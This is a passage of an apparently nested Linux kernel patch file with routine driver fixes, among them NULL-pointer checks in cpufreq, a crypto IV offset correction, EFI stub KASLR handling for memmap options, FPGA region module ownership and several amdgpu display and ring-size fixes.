++	PLL(pll_0822x, FOUT_SHARED3_PLL, "fout_shared3_pll", "oscclk",
+ 	    PLL_LOCKTIME_PLL_SHARED3, PLL_CON3_PLL_SHARED3, NULL),
+-	PLL(pll_0822x, FOUT_SHARED0_PLL, "fout_shared4_pll", "oscclk",
++	PLL(pll_0822x, FOUT_SHARED4_PLL, "fout_shared4_pll", "oscclk",
+ 	    PLL_LOCKTIME_PLL_SHARED4, PLL_CON3_PLL_SHARED4, NULL),
+ };
+ 
+diff --git a/drivers/cpufreq/cppc_cpufreq.c b/drivers/cpufreq/cppc_cpufreq.c
+index 022e3555407c8..8791a88c7741c 100644
+--- a/drivers/cpufreq/cppc_cpufreq.c
++++ b/drivers/cpufreq/cppc_cpufreq.c
+@@ -841,10 +841,15 @@ static unsigned int cppc_cpufreq_get_rate(unsigned int cpu)
+ {
+ 	struct cppc_perf_fb_ctrs fb_ctrs_t0 = {0}, fb_ctrs_t1 = {0};
+ 	struct cpufreq_policy *policy = cpufreq_cpu_get(cpu);
+-	struct cppc_cpudata *cpu_data = policy->driver_data;
++	struct cppc_cpudata *cpu_data;
+ 	u64 delivered_perf;
+ 	int ret;
+ 
++	if (!policy)
++		return -ENODEV;
++
++	cpu_data = policy->driver_data;
++
+ 	cpufreq_cpu_put(policy);
+ 
+ 	ret = cppc_get_perf_ctrs(cpu, &fb_ctrs_t0);
+@@ -924,10 +929,15 @@ static struct cpufreq_driver cppc_cpufreq_driver = {
+ static unsigned int hisi_cppc_cpufreq_get_rate(unsigned int cpu)
+ {
+ 	struct cpufreq_policy *policy = cpufreq_cpu_get(cpu);
+-	struct cppc_cpudata *cpu_data = policy->driver_data;
++	struct cppc_cpudata *cpu_data;
+ 	u64 desired_perf;
+ 	int ret;
+ 
++	if (!policy)
++		return -ENODEV;
++
++	cpu_data = policy->driver_data;
++
+ 	cpufreq_cpu_put(policy);
+ 
+ 	ret = cppc_get_desired_perf(cpu, &desired_perf);
+diff --git a/drivers/cpufreq/cpufreq.c b/drivers/cpufreq/cpufreq.c
+index 91efa23e0e8f3..04d89cf0d71df 100644
+--- a/drivers/cpufreq/cpufreq.c
++++ b/drivers/cpufreq/cpufreq.c
+@@ -1619,10 +1619,13 @@ static void __cpufreq_offline(unsigned int cpu, struct cpufreq_policy *policy)
+ 	 */
+ 	if (cpufreq_driver->offline) {
+ 		cpufreq_driver->offline(policy);
+-	} else if (cpufreq_driver->exit) {
+-		cpufreq_driver->exit(policy);
+-		policy->freq_table = NULL;
++		return;
+ 	}
++
++	if (cpufreq_driver->exit)
++		cpufreq_driver->exit(policy);
++
++	policy->freq_table = NULL;
+ }
+ 
+ static int cpufreq_offline(unsigned int cpu)
+@@ -1680,7 +1683,7 @@ static void cpufreq_remove_dev(struct device *dev, struct subsys_interface *sif)
+ 	}
+ 
+ 	/* We did light-weight exit earlier, do full tear down now */
+-	if (cpufreq_driver->offline)
++	if (cpufreq_driver->offline && cpufreq_driver->exit)
+ 		cpufreq_driver->exit(policy);
+ 
+ 	up_write(&policy->rwsem);
+diff --git a/drivers/crypto/bcm/spu2.c b/drivers/crypto/bcm/spu2.c
+index 07989bb8c220a..3fdc64b5a65e7 100644
+--- a/drivers/crypto/bcm/spu2.c
++++ b/drivers/crypto/bcm/spu2.c
+@@ -495,7 +495,7 @@ static void spu2_dump_omd(u8 *omd, u16 hash_key_len, u16 ciph_key_len,
+ 	if (hash_iv_len) {
+ 		packet_log("  Hash IV Length %u bytes\n", hash_iv_len);
+ 		packet_dump("  hash IV: ", ptr, hash_iv_len);
+-		ptr += ciph_key_len;
++		ptr += hash_iv_len;
+ 	}
+ 
+ 	if (ciph_iv_len) {
+diff --git a/drivers/crypto/ccp/sp-platform.c b/drivers/crypto/ccp/sp-platform.c
+index 7d79a8744f9a6..c43ad7e1acf7e 100644
+--- a/drivers/crypto/ccp/sp-platform.c
++++ b/drivers/crypto/ccp/sp-platform.c
+@@ -39,44 +39,38 @@ static const struct sp_dev_vdata dev_vdata[] = {
+ 	},
+ };
+ 
+-#ifdef CONFIG_ACPI
+ static const struct acpi_device_id sp_acpi_match[] = {
+ 	{ "AMDI0C00", (kernel_ulong_t)&dev_vdata[0] },
+ 	{ },
+ };
+ MODULE_DEVICE_TABLE(acpi, sp_acpi_match);
+-#endif
+ 
+-#ifdef CONFIG_OF
+ static const struct of_device_id sp_of_match[] = {
+ 	{ .compatible = "amd,ccp-seattle-v1a",
+ 	  .data = (const void *)&dev_vdata[0] },
+ 	{ },
+ };
+ MODULE_DEVICE_TABLE(of, sp_of_match);
+-#endif
+ 
+ static struct sp_dev_vdata *sp_get_of_version(struct platform_device *pdev)
+ {
+-#ifdef CONFIG_OF
+ 	const struct of_device_id *match;
+ 
+ 	match = of_match_node(sp_of_match, pdev->dev.of_node);
+ 	if (match && match->data)
+ 		return (struct sp_dev_vdata *)match->data;
+-#endif
++
+ 	return NULL;
+ }
+ 
+ static struct sp_dev_vdata *sp_get_acpi_version(struct platform_device *pdev)
+ {
+-#ifdef CONFIG_ACPI
+ 	const struct acpi_device_id *match;
+ 
+ 	match = acpi_match_device(sp_acpi_match, &pdev->dev);
+ 	if (match && match->driver_data)
+ 		return (struct sp_dev_vdata *)match->driver_data;
+-#endif
++
+ 	return NULL;
+ }
+ 
+@@ -214,12 +208,8 @@ static int sp_platform_resume(struct platform_device *pdev)
+ static struct platform_driver sp_platform_driver = {
+ 	.driver = {
+ 		.name = "ccp",
+-#ifdef CONFIG_ACPI
+ 		.acpi_match_table = sp_acpi_match,
+-#endif
+-#ifdef CONFIG_OF
+ 		.of_match_table = sp_of_match,
+-#endif
+ 	},
+ 	.probe = sp_platform_probe,
+ 	.remove = sp_platform_remove,
+diff --git a/drivers/dma-buf/sync_debug.c b/drivers/dma-buf/sync_debug.c
+index 101394f16930f..237bce21d1e72 100644
+--- a/drivers/dma-buf/sync_debug.c
++++ b/drivers/dma-buf/sync_debug.c
+@@ -110,12 +110,12 @@ static void sync_print_obj(struct seq_file *s, struct sync_timeline *obj)
+ 
+ 	seq_printf(s, "%s: %d\n", obj->name, obj->value);
+ 
+-	spin_lock_irq(&obj->lock);
++	spin_lock(&obj->lock); /* Caller already disabled IRQ. */
+ 	list_for_each(pos, &obj->pt_list) {
+ 		struct sync_pt *pt = container_of(pos, struct sync_pt, link);
+ 		sync_print_fence(s, &pt->base, false);
+ 	}
+-	spin_unlock_irq(&obj->lock);
++	spin_unlock(&obj->lock);
+ }
+ 
+ static void sync_print_sync_file(struct seq_file *s,
+diff --git a/drivers/dma/idma64.c b/drivers/dma/idma64.c
+index af8777a1ec2e3..89e4a3e1d5198 100644
+--- a/drivers/dma/idma64.c
++++ b/drivers/dma/idma64.c
+@@ -594,7 +594,9 @@ static int idma64_probe(struct idma64_chip *chip)
+ 
+ 	idma64->dma.dev = chip->sysdev;
+ 
+-	dma_set_max_seg_size(idma64->dma.dev, IDMA64C_CTLH_BLOCK_TS_MASK);
++	ret = dma_set_max_seg_size(idma64->dma.dev, IDMA64C_CTLH_BLOCK_TS_MASK);
++	if (ret)
++		return ret;
+ 
+ 	ret = dma_async_device_register(&idma64->dma);
+ 	if (ret)
+diff --git a/drivers/extcon/Kconfig b/drivers/extcon/Kconfig
+index 4dd52a6a5b48d..e54e5e64d9abe 100644
+--- a/drivers/extcon/Kconfig
++++ b/drivers/extcon/Kconfig
+@@ -116,7 +116,8 @@ config EXTCON_MAX77843
+ 
+ config EXTCON_MAX8997
+ 	tristate "Maxim MAX8997 EXTCON Support"
+-	depends on MFD_MAX8997 && IRQ_DOMAIN
++	depends on MFD_MAX8997
++	select IRQ_DOMAIN
+ 	help
+ 	  If you say yes here you get support for the MUIC device of
+ 	  Maxim MAX8997 PMIC. The MAX8997 MUIC is a USB port accessory
+diff --git a/drivers/firmware/dmi-id.c b/drivers/firmware/dmi-id.c
+index 940ddf916202a..77a8d43e65d3c 100644
+--- a/drivers/firmware/dmi-id.c
++++ b/drivers/firmware/dmi-id.c
+@@ -169,9 +169,14 @@ static int dmi_dev_uevent(struct device *dev, struct kobj_uevent_env *env)
+ 	return 0;
+ }
+ 
++static void dmi_dev_release(struct device *dev)
++{
++	kfree(dev);
++}
++
+ static struct class dmi_class = {
+ 	.name = "dmi",
+-	.dev_release = (void(*)(struct device *)) kfree,
++	.dev_release = dmi_dev_release,
+ 	.dev_uevent = dmi_dev_uevent,
+ };
+ 
+diff --git a/drivers/firmware/efi/libstub/fdt.c b/drivers/firmware/efi/libstub/fdt.c
+index 70e9789ff9de0..6a337f1f8787b 100644
+--- a/drivers/firmware/efi/libstub/fdt.c
++++ b/drivers/firmware/efi/libstub/fdt.c
+@@ -335,8 +335,8 @@ efi_status_t allocate_new_fdt_and_exit_boot(void *handle,
+ 
+ fail:
+ 	efi_free(fdt_size, fdt_addr);
+-
+-	efi_bs_call(free_pool, priv.runtime_map);
++	if (!efi_novamap)
++		efi_bs_call(free_pool, priv.runtime_map);
+ 
+ 	return EFI_LOAD_ERROR;
+ }
+diff --git a/drivers/firmware/efi/libstub/x86-stub.c b/drivers/firmware/efi/libstub/x86-stub.c
+index 55468debd55d0..f7eb389aeec06 100644
+--- a/drivers/firmware/efi/libstub/x86-stub.c
++++ b/drivers/firmware/efi/libstub/x86-stub.c
+@@ -736,6 +736,26 @@ static void error(char *str)
+ 	efi_warn("Decompression failed: %s\n", str);
+ }
+ 
++static const char *cmdline_memmap_override;
++
++static efi_status_t parse_options(const char *cmdline)
++{
++	static const char opts[][14] = {
++		"mem=", "memmap=", "efi_fake_mem=", "hugepages="
++	};
++
++	for (int i = 0; i < ARRAY_SIZE(opts); i++) {
++		const char *p = strstr(cmdline, opts[i]);
++
++		if (p == cmdline || (p > cmdline && isspace(p[-1]))) {
++			cmdline_memmap_override = opts[i];
++			break;
++		}
++	}
++
++	return efi_parse_options(cmdline);
++}
++
+ static efi_status_t efi_decompress_kernel(unsigned long *kernel_entry)
+ {
+ 	unsigned long virt_addr = LOAD_PHYSICAL_ADDR;
+@@ -767,6 +787,10 @@ static efi_status_t efi_decompress_kernel(unsigned long *kernel_entry)
+ 		    !memcmp(efistub_fw_vendor(), ami, sizeof(ami))) {
+ 			efi_debug("AMI firmware v2.0 or older detected - disabling physical KASLR\n");
+ 			seed[0] = 0;
++		} else if (cmdline_memmap_override) {
++			efi_info("%s detected on the kernel command line - disabling physical KASLR\n",
++				 cmdline_memmap_override);
++			seed[0] = 0;
+ 		}
+ 
+ 		boot_params_ptr->hdr.loadflags |= KASLR_FLAG;
+@@ -843,7 +867,7 @@ void __noreturn efi_stub_entry(efi_handle_t handle,
+ 	}
+ 
+ #ifdef CONFIG_CMDLINE_BOOL
+-	status = efi_parse_options(CONFIG_CMDLINE);
++	status = parse_options(CONFIG_CMDLINE);
+ 	if (status != EFI_SUCCESS) {
+ 		efi_err("Failed to parse options\n");
+ 		goto fail;
+@@ -852,7 +876,7 @@ void __noreturn efi_stub_entry(efi_handle_t handle,
+ 	if (!IS_ENABLED(CONFIG_CMDLINE_OVERRIDE)) {
+ 		unsigned long cmdline_paddr = ((u64)hdr->cmd_line_ptr |
+ 					       ((u64)boot_params->ext_cmd_line_ptr << 32));
+-		status = efi_parse_options((char *)cmdline_paddr);
++		status = parse_options((char *)cmdline_paddr);
+ 		if (status != EFI_SUCCESS) {
+ 			efi_err("Failed to parse options\n");
+ 			goto fail;
+diff --git a/drivers/firmware/raspberrypi.c b/drivers/firmware/raspberrypi.c
+index dba315f675bc7..ec223976c972d 100644
+--- a/drivers/firmware/raspberrypi.c
++++ b/drivers/firmware/raspberrypi.c
+@@ -9,6 +9,7 @@
+ #include <linux/dma-mapping.h>
+ #include <linux/kref.h>
+ #include <linux/mailbox_client.h>
++#include <linux/mailbox_controller.h>
+ #include <linux/module.h>
+ #include <linux/of_platform.h>
+ #include <linux/platform_device.h>
+@@ -96,8 +97,8 @@ int rpi_firmware_property_list(struct rpi_firmware *fw,
+ 	if (size & 3)
+ 		return -EINVAL;
+ 
+-	buf = dma_alloc_coherent(fw->cl.dev, PAGE_ALIGN(size), &bus_addr,
+-				 GFP_ATOMIC);
++	buf = dma_alloc_coherent(fw->chan->mbox->dev, PAGE_ALIGN(size),
++				 &bus_addr, GFP_ATOMIC);
+ 	if (!buf)
+ 		return -ENOMEM;
+ 
+@@ -125,7 +126,7 @@ int rpi_firmware_property_list(struct rpi_firmware *fw,
+ 		ret = -EINVAL;
+ 	}
+ 
+-	dma_free_coherent(fw->cl.dev, PAGE_ALIGN(size), buf, bus_addr);
++	dma_free_coherent(fw->chan->mbox->dev, PAGE_ALIGN(size), buf, bus_addr);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/fpga/dfl-pci.c b/drivers/fpga/dfl-pci.c
+index 0914e7328b1a5..4220ef00a555e 100644
+--- a/drivers/fpga/dfl-pci.c
++++ b/drivers/fpga/dfl-pci.c
+@@ -79,6 +79,7 @@ static void cci_pci_free_irq(struct pci_dev *pcidev)
+ #define PCIE_DEVICE_ID_SILICOM_PAC_N5011	0x1001
+ #define PCIE_DEVICE_ID_INTEL_DFL		0xbcce
+ /* PCI Subdevice ID for PCIE_DEVICE_ID_INTEL_DFL */
++#define PCIE_SUBDEVICE_ID_INTEL_D5005		0x138d
+ #define PCIE_SUBDEVICE_ID_INTEL_N6000		0x1770
+ #define PCIE_SUBDEVICE_ID_INTEL_N6001		0x1771
+ #define PCIE_SUBDEVICE_ID_INTEL_C6100		0x17d4
+@@ -102,6 +103,8 @@ static struct pci_device_id cci_pcie_id_tbl[] = {
+ 	{PCI_DEVICE(PCI_VENDOR_ID_INTEL, PCIE_DEVICE_ID_INTEL_PAC_D5005_VF),},
+ 	{PCI_DEVICE(PCI_VENDOR_ID_SILICOM_DENMARK, PCIE_DEVICE_ID_SILICOM_PAC_N5010),},
+ 	{PCI_DEVICE(PCI_VENDOR_ID_SILICOM_DENMARK, PCIE_DEVICE_ID_SILICOM_PAC_N5011),},
++	{PCI_DEVICE_SUB(PCI_VENDOR_ID_INTEL, PCIE_DEVICE_ID_INTEL_DFL,
++			PCI_VENDOR_ID_INTEL, PCIE_SUBDEVICE_ID_INTEL_D5005),},
+ 	{PCI_DEVICE_SUB(PCI_VENDOR_ID_INTEL, PCIE_DEVICE_ID_INTEL_DFL,
+ 			PCI_VENDOR_ID_INTEL, PCIE_SUBDEVICE_ID_INTEL_N6000),},
+ 	{PCI_DEVICE_SUB(PCI_VENDOR_ID_INTEL, PCIE_DEVICE_ID_INTEL_DFL_VF,
+diff --git a/drivers/fpga/fpga-region.c b/drivers/fpga/fpga-region.c
+index 27ff9dea04ae3..3aefd9d89356e 100644
+--- a/drivers/fpga/fpga-region.c
++++ b/drivers/fpga/fpga-region.c
+@@ -52,7 +52,7 @@ static struct fpga_region *fpga_region_get(struct fpga_region *region)
+ 	}
+ 
+ 	get_device(dev);
+-	if (!try_module_get(dev->parent->driver->owner)) {
++	if (!try_module_get(region->ops_owner)) {
+ 		put_device(dev);
+ 		mutex_unlock(&region->mutex);
+ 		return ERR_PTR(-ENODEV);
+@@ -74,7 +74,7 @@ static void fpga_region_put(struct fpga_region *region)
+ 
+ 	dev_dbg(dev, "put\n");
+ 
+-	module_put(dev->parent->driver->owner);
++	module_put(region->ops_owner);
+ 	put_device(dev);
+ 	mutex_unlock(&region->mutex);
+ }
+@@ -180,14 +180,16 @@ static struct attribute *fpga_region_attrs[] = {
+ ATTRIBUTE_GROUPS(fpga_region);
+ 
+ /**
+- * fpga_region_register_full - create and register an FPGA Region device
++ * __fpga_region_register_full - create and register an FPGA Region device
+  * @parent: device parent
+  * @info: parameters for FPGA Region
++ * @owner: module containing the get_bridges function
+  *
+  * Return: struct fpga_region or ERR_PTR()
+  */
+ struct fpga_region *
+-fpga_region_register_full(struct device *parent, const struct fpga_region_info *info)
++__fpga_region_register_full(struct device *parent, const struct fpga_region_info *info,
++			    struct module *owner)
+ {
+ 	struct fpga_region *region;
+ 	int id, ret = 0;
+@@ -212,6 +214,7 @@ fpga_region_register_full(struct device *parent, const struct fpga_region_info *
+ 	region->compat_id = info->compat_id;
+ 	region->priv = info->priv;
+ 	region->get_bridges = info->get_bridges;
++	region->ops_owner = owner;
+ 
+ 	mutex_init(&region->mutex);
+ 	INIT_LIST_HEAD(&region->bridge_list);
+@@ -240,13 +243,14 @@ fpga_region_register_full(struct device *parent, const struct fpga_region_info *
+ 
+ 	return ERR_PTR(ret);
+ }
+-EXPORT_SYMBOL_GPL(fpga_region_register_full);
++EXPORT_SYMBOL_GPL(__fpga_region_register_full);
+ 
+ /**
+- * fpga_region_register - create and register an FPGA Region device
++ * __fpga_region_register - create and register an FPGA Region device
+  * @parent: device parent
+  * @mgr: manager that programs this region
+  * @get_bridges: optional function to get bridges to a list
++ * @owner: module containing the get_bridges function
+  *
+  * This simple version of the register function should be sufficient for most users.
+  * The fpga_region_register_full() function is available for users that need to
+@@ -255,17 +259,17 @@ EXPORT_SYMBOL_GPL(fpga_region_register_full);
+  * Return: struct fpga_region or ERR_PTR()
+  */
+ struct fpga_region *
+-fpga_region_register(struct device *parent, struct fpga_manager *mgr,
+-		     int (*get_bridges)(struct fpga_region *))
++__fpga_region_register(struct device *parent, struct fpga_manager *mgr,
++		       int (*get_bridges)(struct fpga_region *), struct module *owner)
+ {
+ 	struct fpga_region_info info = { 0 };
+ 
+ 	info.mgr = mgr;
+ 	info.get_bridges = get_bridges;
+ 
+-	return fpga_region_register_full(parent, &info);
++	return __fpga_region_register_full(parent, &info, owner);
+ }
+-EXPORT_SYMBOL_GPL(fpga_region_register);
++EXPORT_SYMBOL_GPL(__fpga_region_register);
+ 
+ /**
+  * fpga_region_unregister - unregister an FPGA region
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c
+index bebd136ed5444..9a4cbfbd5d9e5 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c
+@@ -1083,6 +1083,7 @@ void amdgpu_mes_remove_ring(struct amdgpu_device *adev,
+ 		return;
+ 
+ 	amdgpu_mes_remove_hw_queue(adev, ring->hw_queue_id);
++	del_timer_sync(&ring->fence_drv.fallback_timer);
+ 	amdgpu_ring_fini(ring);
+ 	kfree(ring);
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+index 9a111988b7f15..7acf1586882e1 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+@@ -585,6 +585,8 @@ int amdgpu_bo_create(struct amdgpu_device *adev,
+ 	else
+ 		amdgpu_bo_placement_from_domain(bo, bp->domain);
+ 	if (bp->type == ttm_bo_type_kernel)
++		bo->tbo.priority = 2;
++	else if (!(bp->flags & AMDGPU_GEM_CREATE_DISCARDABLE))
+ 		bo->tbo.priority = 1;
+ 
+ 	if (!bp->destroy)
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v10_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v10_0.c
+index 84a36b50ddd87..f8382b227ad46 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v10_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v10_0.c
+@@ -9352,7 +9352,7 @@ static const struct amdgpu_ring_funcs gfx_v10_0_ring_funcs_gfx = {
+ 		7 + /* PIPELINE_SYNC */
+ 		SOC15_FLUSH_GPU_TLB_NUM_WREG * 5 +
+ 		SOC15_FLUSH_GPU_TLB_NUM_REG_WAIT * 7 +
+-		2 + /* VM_FLUSH */
++		4 + /* VM_FLUSH */
+ 		8 + /* FENCE for VM_FLUSH */
+ 		20 + /* GDS switch */
+ 		4 + /* double SWITCH_BUFFER,
+@@ -9445,7 +9445,6 @@ static const struct amdgpu_ring_funcs gfx_v10_0_ring_funcs_kiq = {
+ 		7 + /* gfx_v10_0_ring_emit_pipeline_sync */
+ 		SOC15_FLUSH_GPU_TLB_NUM_WREG * 5 +
+ 		SOC15_FLUSH_GPU_TLB_NUM_REG_WAIT * 7 +
+-		2 + /* gfx_v10_0_ring_emit_vm_flush */
+ 		8 + 8 + 8, /* gfx_v10_0_ring_emit_fence_kiq x3 for user fence, vm fence */
+ 	.emit_ib_size =	7, /* gfx_v10_0_ring_emit_ib_compute */
+ 	.emit_ib = gfx_v10_0_ring_emit_ib_compute,
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+index 5a5787bfbce7f..1f9f7fdd4b8e0 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+@@ -6157,7 +6157,7 @@ static const struct amdgpu_ring_funcs gfx_v11_0_ring_funcs_gfx = {
+ 		7 + /* PIPELINE_SYNC */
+ 		SOC15_FLUSH_GPU_TLB_NUM_WREG * 5 +
+ 		SOC15_FLUSH_GPU_TLB_NUM_REG_WAIT * 7 +
+-		2 + /* VM_FLUSH */
++		4 + /* VM_FLUSH */
+ 		8 + /* FENCE for VM_FLUSH */
+ 		20 + /* GDS switch */
+ 		5 + /* COND_EXEC */
+@@ -6243,7 +6243,6 @@ static const struct amdgpu_ring_funcs gfx_v11_0_ring_funcs_kiq = {
+ 		7 + /* gfx_v11_0_ring_emit_pipeline_sync */
+ 		SOC15_FLUSH_GPU_TLB_NUM_WREG * 5 +
+ 		SOC15_FLUSH_GPU_TLB_NUM_REG_WAIT * 7 +
+-		2 + /* gfx_v11_0_ring_emit_vm_flush */
+ 		8 + 8 + 8, /* gfx_v11_0_ring_emit_fence_kiq x3 for user fence, vm fence */
+ 	.emit_ib_size =	7, /* gfx_v11_0_ring_emit_ib_compute */
+ 	.emit_ib = gfx_v11_0_ring_emit_ib_compute,
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c
+index 195b298923543..6a1fe21685149 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c
+@@ -6742,7 +6742,6 @@ static const struct amdgpu_ring_funcs gfx_v9_0_ring_funcs_compute = {
+ 		7 + /* gfx_v9_0_ring_emit_pipeline_sync */
+ 		SOC15_FLUSH_GPU_TLB_NUM_WREG * 5 +
+ 		SOC15_FLUSH_GPU_TLB_NUM_REG_WAIT * 7 +
+-		2 + /* gfx_v9_0_ring_emit_vm_flush */
+ 		8 + 8 + 8 + /* gfx_v9_0_ring_emit_fence x3 for user fence, vm fence */
+ 		7 + /* gfx_v9_0_emit_mem_sync */
+ 		5 + /* gfx_v9_0_emit_wave_limit for updating mmSPI_WCL_PIPE_PERCENT_GFX register */
+@@ -6781,7 +6780,6 @@ static const struct amdgpu_ring_funcs gfx_v9_0_ring_funcs_kiq = {
+ 		7 + /* gfx_v9_0_ring_emit_pipeline_sync */
+ 		SOC15_FLUSH_GPU_TLB_NUM_WREG * 5 +
+ 		SOC15_FLUSH_GPU_TLB_NUM_REG_WAIT * 7 +
+-		2 + /* gfx_v9_0_ring_emit_vm_flush */
+ 		8 + 8 + 8, /* gfx_v9_0_ring_emit_fence_kiq x3 for user fence, vm fence */
+ 	.emit_ib_size =	7, /* gfx_v9_0_ring_emit_ib_compute */
+ 	.emit_fence = gfx_v9_0_ring_emit_fence_kiq,
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_process.c b/drivers/gpu/drm/amd/amdkfd/kfd_process.c
+index 7f68d51541e8e..5bca6abd55aef 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_process.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_process.c
+@@ -823,6 +823,14 @@ struct kfd_process *kfd_create_process(struct file *filep)
+ 	if (process) {
+ 		pr_debug("Process already found\n");
+ 	} else {
++		/* If the process just called exec(3), it is possible that the
++		 * cleanup of the kfd_process (following the release of the mm
++		 * of the old process image) is still in the cleanup work queue.
++		 * Make sure to drain any job before trying to recreate any
++		 * resource for this process.
++		 */
++		flush_workqueue(kfd_process_wq);
++
+ 		process = create_process(thread);
+ 		if (IS_ERR(process))
+ 			goto out;
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index ff460c9802eb2..31bae620aeffc 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -2964,6 +2964,7 @@ static int dm_resume(void *handle)
+ 			dc_stream_release(dm_new_crtc_state->stream);
+ 			dm_new_crtc_state->stream = NULL;
+ 		}
++		dm_new_crtc_state->base.color_mgmt_changed = true;
+ 	}
+ 
+ 	for_each_new_plane_in_state(dm->cached_state, plane, new_plane_state, i) {
+diff --git a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn315/dcn315_clk_mgr.c b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn315/dcn315_clk_mgr.c
+index 28b83133db910..09eb1bc9aa030 100644
+--- a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn315/dcn315_clk_mgr.c
++++ b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn315/dcn315_clk_mgr.c
+@@ -131,6 +131,10 @@ static void dcn315_update_clocks(struct clk_mgr *clk_mgr_base,
+ 	 */
+ 	clk_mgr_base->clks.zstate_support = new_clocks->zstate_support;
+ 	if (safe_to_lower) {
++		if (clk_mgr_base->clks.dtbclk_en && !new_clocks->dtbclk_en) {
++			dcn315_smu_set_dtbclk(clk_mgr, false);
++			clk_mgr_base->clks.dtbclk_en = new_clocks->dtbclk_en;
++		}
+ 		/* check that we're not already in lower */
+ 		if (clk_mgr_base->clks.pwr_state != DCN_PWR_STATE_LOW_POWER) {
+ 			display_count = dcn315_get_active_display_cnt_wa(dc, context);
+@@ -146,6 +150,10 @@ static void dcn315_update_clocks(struct clk_mgr *clk_mgr_base,
+ 			}
+ 		}
+ 	} else {
++		if (!clk_mgr_base->clks.dtbclk_en && new_clocks->dtbclk_en) {
++			dcn315_smu_set_dtbclk(clk_mgr, true);
++			clk_mgr_base->clks.dtbclk_en = new_clocks->dtbclk_en;
++		}
+ 		/* check that we're not already in D0 */
+ 		if (clk_mgr_base->clks.pwr_state != DCN_PWR_STATE_MISSION_MODE) {
+ 			union display_idle_optimization_u idle_info = { 0 };
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_cm_common.c b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_cm_common.c
+index 3538973bd0c6c..c0372aa4ec838 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_cm_common.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_cm_common.c
+@@ -382,6 +382,11 @@ bool cm_helper_translate_curve_to_hw_format(struct dc_context *ctx,
+ 				i += increment) {
+ 			if (j == hw_points - 1)
+ 				break;
++			if (i >= TRANSFER_FUNC_POINTS) {
++				DC_LOG_ERROR("Index out of bounds: i=%d, TRANSFER_FUNC_POINTS=%d\n",
++					     i, TRANSFER_FUNC_POINTS);
++				return false;
++			}
+ 			rgb_resulted[j].red = output_tf->tf_pts.red[i];
+ 			rgb_resulted[j].green = output_tf->tf_pts.green[i];
+ 			rgb_resulted[j].blue = output_tf->tf_pts.blue[i];
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.c
+index 19d034341e640..cb2f6cd73af54 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.c
+@@ -291,6 +291,7 @@ static struct _vcs_dpi_soc_bounding_box_st dcn3_15_soc = {
+ 	.do_urgent_latency_adjustment = false,
+ 	.urgent_latency_adjustment_fabric_clock_component_us = 0,
+ 	.urgent_latency_adjustment_fabric_clock_reference_mhz = 0,
++	.dispclk_dppclk_vco_speed_mhz = 2400.0,
+ 	.num_chans = 4,
+ 	.dummy_pstate_latency_us = 10.0
+ };
+@@ -438,6 +439,7 @@ static struct _vcs_dpi_soc_bounding_box_st dcn3_16_soc = {
+ 	.do_urgent_latency_adjustment = false,
+ 	.urgent_latency_adjustment_fabric_clock_component_us = 0,
+ 	.urgent_latency_adjustment_fabric_clock_reference_mhz = 0,
++	.dispclk_dppclk_vco_speed_mhz = 2500.0,
+ };
+ 
+ void dcn31_zero_pipe_dcc_fraction(display_e2e_pipe_params_st *pipes,
+diff --git a/drivers/gpu/drm/arm/malidp_mw.c b/drivers/gpu/drm/arm/malidp_mw.c
+index ef76d0e6ee2fc..389d32994135b 100644
+--- a/drivers/gpu/drm/arm/malidp_mw.c
++++ b/drivers/gpu/drm/arm/malidp_mw.c
+@@ -72,7 +72,10 @@ static void malidp_mw_connector_reset(struct drm_connector *connector)
+ 		__drm_atomic_helper_connector_destroy_state(connector->state);
+ 
+ 	kfree(connector->state);
+-	__drm_atomic_helper_connector_reset(connector, &mw_state->base);
++	connector->state = NULL;
++
++	if (mw_state)
++		__drm_atomic_helper_connector_reset(connector, &mw_state->base);
+ }
+ 
+ static enum drm_connector_status
+diff --git a/drivers/gpu/drm/bridge/analogix/anx7625.c b/drivers/gpu/drm/bridge/analogix/anx7625.c
+index 77a304ac4d75e..193015c75b454 100644
